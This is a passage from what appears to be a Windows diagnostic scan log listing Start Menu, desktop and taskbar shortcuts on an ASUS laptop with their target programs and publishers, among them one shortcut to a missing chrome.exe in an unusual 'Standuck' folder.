        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\07 - Videos.lnk → C:\Users\ASUS\Videos ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\08 - Homegroup.lnk → Microsoft.Windows.Homegroup
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\09 - Network.lnk → Microsoft.Windows.Network
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\10 - UserProfile.lnk → C:\Users\ASUS ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\SmartAudio.lnk → C:\Program Files\CONEXANT\SAII\SmartAudio.exe (Conexant Systems, Inc)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS6 (64bit).lnk → C:\Program Files\Adobe\Adobe Bridge CS6 (64 Bit)\Bridge.exe (Adobe Systems, Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS6.lnk → C:\Program Files (x86)\Adobe\Adobe Bridge CS6\Bridge.exe (Adobe Systems, Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit CS6.lnk → C:\Program Files (x86)\Adobe\Adobe Utilities - CS6\ExtendScript Toolkit CS6\ExtendScript Toolkit.exe (Adobe Systems Incorporated)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Extension Manager CS6.lnk → C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Adobe Extension Manager CS6.exe (Adobe Systems Incorporated)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6 (64 Bit).lnk → C:\Program Files\Adobe\Adobe Photoshop CS6 (64 Bit)\Photoshop.exe (Adobe Systems, Incorporated)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6.lnk → C:\Program Files (x86)\Adobe\Adobe Photoshop CS6\Photoshop.exe (Adobe Systems, Incorporated)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk → C:\Windows\Installer{AC76BA86-7AD7-1033-7B44-AB0000000001}\SC_Reader.ico ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk → C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk → C:\Windows\System32\control.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk → C:\Windows\MiracastView\MiracastView.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk → C:\Program Files (x86)\Firefox\Firefox.exe (No File)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk → C:\Windows\PrintDialog\PrintDialog.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Project 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\WINPROJ.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client.lnk → D:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe (TeamSpeak Systems GmbH)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visio 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\VISIO.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware\Zemana AntiMalware.lnk → D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe (Copyright 2017.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Console RAR manual.lnk → C:\Program Files\WinRAR\Rar.txt ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\What is new in the latest version.lnk → C:\Program Files\WinRAR\WhatsNew.txt ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR help.lnk → C:\Program Files\WinRAR\WinRAR.chm ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk → C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Uninstall Winamp.lnk → C:\Program Files (x86)\Winamp\UninstWA.exe (Nullsoft, Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\What’s New.lnk → C:\Program Files (x86)\Winamp\whatsnew.txt ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Winamp.lnk → C:\Program Files (x86)\Winamp\winamp.exe (Nullsoft, Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows Defender.lnk → C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy\Speccy.lnk → C:\Program Files\Speccy\Speccy64.exe (Piriform Ltd)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype\Skype.lnk → C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer\Razer Cortex\Razer Cortex.lnk → D:\Program Files (x86)\Razer\Razer Cortex\CortexLauncher.exe (Razer Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online (Test Server).lnk → D:\Games\Ragnarok\iRO\RO Online\Sakray.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online Classic.lnk → D:\Games\Ragnarok\iRO\RO Online\ClassicRO.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online.lnk → D:\Games\Ragnarok\iRO\RO Online\Ragnarok.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\GeForce Experience.lnk → C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe (NVIDIA Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Office 2016 Language Preferences.lnk → C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Telemetry Dashboard for Office 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\msotd.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Telemetry Log for Office 2016.lnk → C:\Program Files\Microsoft Office\root\Office16\msoev.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Codec Tweak Tool.lnk → C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Media Player Classic.lnk → C:\Program Files (x86)\K-Lite Codec Pack\MPC-HC64\mpc-hc64_nvo.exe (MPC-HC Team)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Uninstall\Uninstall K-Lite Codec Pack.lnk → C:\Program Files (x86)\K-Lite Codec Pack\unins000.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\GraphStudioNext (x64).lnk → C:\Program Files (x86)\K-Lite Codec Pack\Tools\GraphStudioNext64.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\GraphStudioNext.lnk → C:\Program Files (x86)\K-Lite Codec Pack\Tools\GraphStudioNext.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\MediaInfo.lnk → C:\Program Files (x86)\K-Lite Codec Pack\Tools\mediainfo.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ICEpower\AudioWizard\AudioWizard.lnk → C:\Windows\Installer{57E770A2-2BAF-4CAA-BAA3-BD896E2254D3}\NewShortcut2_CAFC68A201474C958303AEA C0F6DBEDB.exe (Flexera Software LLC)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\Changelog.lnk → D:\Program Files (x86)\HxD\changelog.txt ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\HxD.lnk → D:\Program Files (x86)\HxD\HxD.exe (Maël Hörz)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\License.lnk → D:\Program Files (x86)\HxD\license.txt ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\Readme.lnk → D:\Program Files (x86)\HxD\readme.txt ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot Shield\Hotspot Shield.lnk → C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe (AnchorFree Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Conexant\SAII\SmartAudio.lnk → C:\Program Files\CONEXANT\SAII\SmartAudio.exe (Conexant Systems, Inc)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk → C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BattlePing\BattlePing.lnk → D:\Program Files (x86)\BattlePing\BattlePing.exe (BattlePing)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BattlePing\Uninstall BattlePing.lnk → D:\Program Files (x86)\BattlePing\Uninstall.exe ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG\AVG Protection.lnk → C:\Program Files (x86)\AVG\Av\avgui.exe (AVG Technologies CZ, s.r.o.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS\ASUS Touchpad Handwriting.lnk → C:\Program Files (x86)\ASUS\ASUS Touchpad Handwriting\Exe\x64\AsusTPHandWriting64.exe (ASUSTeK Computer Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS\eManual.Lnk → C:\eSupport\Manual\eManual.exe (ASUSTek Computer Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS\WinFlash.Lnk → C:\Program Files (x86)\ASUS\WinFlash\WinFlash.exe (ASUSTek Computer Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ArcSoft WebCam Companion 3\WebCam Companion 3.lnk → C:\Windows\Installer{34985F59-8F6F-46F4-9AD5-53E2714294D2}\NewShortcut2_AF2BBC59871C42DEBB63453 06E623A0F.exe (Acresso Software Inc.)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk → C:\Windows\System32\comexp.msc ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk → C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk → C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk → C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk → C:\Windows\System32\MdSched.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk → C:\Windows\SysWOW64\odbcad32.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk → C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk → C:\Windows\System32\printmanagement.msc ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk → C:\Windows\System32\services.msc ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk → C:\Windows\System32\msconfig.exe (Microsoft® Windows® Operating System)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk → C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk → C:\Windows\System32\WF.msc ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3 Device Detector.lnk → C:\Windows\Installer{1B280FAF-AE10-4E31-A41A-DB3917D651DC}\DevDetectPMShortcut_ECE0113B23D04DD8 89E6D2F026CABF03.exe (Macrovision Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3 Showroom.lnk → C:\Windows\Installer{1B280FAF-AE10-4E31-A41A-DB3917D651DC}\ACDSeeShowroomShor_89621A33AFFC45029 C8C9D5A4EA9D15A.exe (Macrovision Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3.lnk → C:\Windows\Installer{1B280FAF-AE10-4E31-A41A-DB3917D651DC}\ACDSeePMShortcut_F99F74B4972B4B06B89 36B3B0DB0128B.exe (Macrovision Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk → C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk → C:\Windows\System32\mspaint.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk → C:\Windows\System32\quickassist.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk → C:\Windows\System32\mstsc.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk → C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk → C:\Windows\System32\psr.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk → C:\Windows\System32\WFS.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk → C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\XPS Viewer.lnk → C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk → C:\Windows\System32\charmap.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\Links\Desktop.lnk → C:\Users\ASUS\Desktop ()
        Shortcut: C:\Users\ASUS\Links\Downloads.lnk → C:\Users\ASUS\Downloads ()
        Shortcut: C:\Users\ASUS\Desktop\chrome - Shortcut.lnk → C:\Program Files (x86)\Standuck\Application\chrome.exe (No File)
        Shortcut: C:\Users\ASUS\Desktop\opensetup - Shortcut.lnk → D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\opensetup.exe (Ai4rei/AN)
        Shortcut: C:\Users\ASUS\Desktop\Spotify.lnk → C:\Users\ASUS\AppData\Roaming\Spotify\Spotify.exe (Spotify Ltd)
        Shortcut: C:\Users\ASUS\Desktop\Pinned to Taskbar\BattlePing.lnk → D:\Program Files (x86)\BattlePing\BattlePing.exe (BattlePing)
        Shortcut: C:\Users\ASUS\Desktop\Pinned to Taskbar\Ragnarok.lnk → D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragnarok.exe ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Vegas Pro 13.0 (64-bit).lnk → C:\Program Files\Sony\Vegas Pro 13.0\vegas130.exe (Sony Creative Software Inc.)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\bdcam.lnk → D:\Program Files (x86)\Bandicam\bdcam.exe (Bandicam Company)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Google Chrome.lnk → [LFPO :i+00]
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\GRF Editor.lnk → D:\Games\Ragnarok\Editing Ragnarok\GRF Editor\GRF Editor.exe ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\hookup.lnk → D:\Cheat Engine 6.6\hookup.exe (Cheat Engine)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Internet Explorer.lnk → C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\OneDrive.lnk → C:\Users\ASUS\AppData\Local\Microsoft\OneDrive\One Drive.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Optional Features.lnk → C:\Windows\System32\fodhelper.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Spotify.lnk → C:\Users\ASUS\AppData\Roaming\Spotify\Spotify.exe (Spotify Ltd)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\WinRAR\Console RAR manual.lnk → C:\Program Files\WinRAR\Rar.txt ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\WinRAR\What is new in the latest version.lnk → C:\Program Files\WinRAR\WhatsNew.txt ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\WinRAR\WinRAR help.lnk → C:\Program Files\WinRAR\WinRAR.chm ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\WinRAR\WinRAR.lnk → C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk → C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk → C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerSh ell_ISE.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\PowerSh ell_ISE.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Windows PowerShell\Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Winamp Detector Plug-in\Uninstall Winamp Detector Plug-in.lnk → C:\Program Files (x86)\Winamp Detect\UninstWaDetect.exe (Nullsoft, Inc.)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\System Tools\Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\System Tools\computer.lnk → C:\Windows\explorer.exe,-30
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\System Tools\Control Panel.lnk → C:\Windows\System32\imageres.dll (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\System Tools\File Explorer.lnk → C:\Windows\explorer.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\System Tools\Run.lnk → C:\Windows\System32\shell32.dll (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Sony\ Vegas Pro 13.0\Exµs ™.lnk → C:\Program Files\Sony\Vegas Pro 13.0\Ex\Exµs ™ - Home - Webs.url ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Sony\ Vegas Pro 13.0\Vegas Pro 13.0 Readme.lnk → C:\Program Files\Sony\Vegas Pro 13.0\Readme\Vegas_readme.htm ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Sony\ Vegas Pro 13.0\Vegas Pro 13.0.lnk → C:\Program Files\Sony\Vegas Pro 13.0\vegas130.exe (Sony Creative Software Inc.)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Accessories\Internet Explorer.lnk → C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Accessories\Notepad.lnk → C:\Windows\System32\notepad.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Accessibility\Magnify.lnk → C:\Windows\System32\Magnify.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Accessibility\Narrator.lnk → C:\Windows\System32\Narrator.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Accessibility\On-Screen Keyboard.lnk → C:\Windows\System32\osk.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\Se ndTo\Bluetooth File Transfer.LNK → C:\Windows\System32\fsquirt.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk → C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk → C:\Windows\System32\imageres.dll (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Winamp.lnk → C:\Program Files (x86)\Winamp\winamp.exe (Nullsoft, Inc.)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk → C:\Windows\explorer.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BattlePing.lnk → D:\Program Files (x86)\BattlePing\BattlePing.exe (BattlePing)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk → %SNP%
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Ragnarok.lnk → D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragnarok.exe ()
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk → C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\e2c643ea365188f1\Googl e Chrome.lnk → [LFPO :i+00]
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\01 - Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\01a - Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\02 - Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\02a - Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\03 - Computer Management.lnk → C:\Windows\System32\compmgmt.msc ()
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\04 - Disk Management.lnk → C:\Windows\System32\diskmgmt.msc ()
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\07 - Event Viewer.lnk → C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\09 - Mobility Center.lnk → C:\Windows\System32\mblctr.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group2\4 - Control Panel.lnk → C:\Windows\System32\control.exe (Microsoft Corporation)
        Shortcut: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Chrome App Launcher.lnk → C:\Users\ASUS\AppData\Local\Google\Chrome\Applicat ion\chrome.exe (No File)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk → C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk → C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerSh ell_ISE.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\PowerSh ell_ISE.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\System Tools\Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\System Tools\computer.lnk → C:\Windows\explorer.exe,-30
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\System Tools\Control Panel.lnk → C:\Windows\System32\imageres.dll (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\System Tools\File Explorer.lnk → C:\Windows\explorer.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\System Tools\Run.lnk → C:\Windows\System32\shell32.dll (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Accessories\Notepad.lnk → C:\Windows\System32\notepad.exe (Microsoft Corporation)
